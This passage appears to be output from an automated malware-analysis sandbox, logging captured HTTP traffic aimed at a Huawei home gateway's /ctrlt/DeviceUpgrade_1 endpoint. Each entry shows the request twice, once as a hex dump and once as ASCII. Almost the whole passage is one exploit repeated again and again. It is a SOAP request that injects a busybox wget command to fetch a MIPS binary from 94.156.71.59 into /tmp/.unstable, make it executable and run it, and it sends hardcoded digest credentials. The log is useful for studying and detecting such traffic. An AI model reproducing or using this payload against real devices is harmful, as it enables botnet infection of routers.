62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; 